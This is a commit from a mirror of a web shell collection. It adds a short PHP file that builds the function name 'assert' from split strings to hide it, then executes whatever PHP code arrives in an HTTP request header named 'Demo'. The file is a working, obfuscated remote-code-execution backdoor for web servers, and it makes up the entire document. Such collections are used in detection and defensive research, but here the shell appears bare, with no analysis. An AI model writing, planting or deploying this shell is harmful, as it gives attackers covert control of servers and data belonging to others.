1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
tennc
2022-09-09 23:14:12 +08:00
committed by GitHub
parent 33e854d721
commit 35d39e031c

8
php/2022-09-09-04.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c(getallheaders()['Demo']);
?>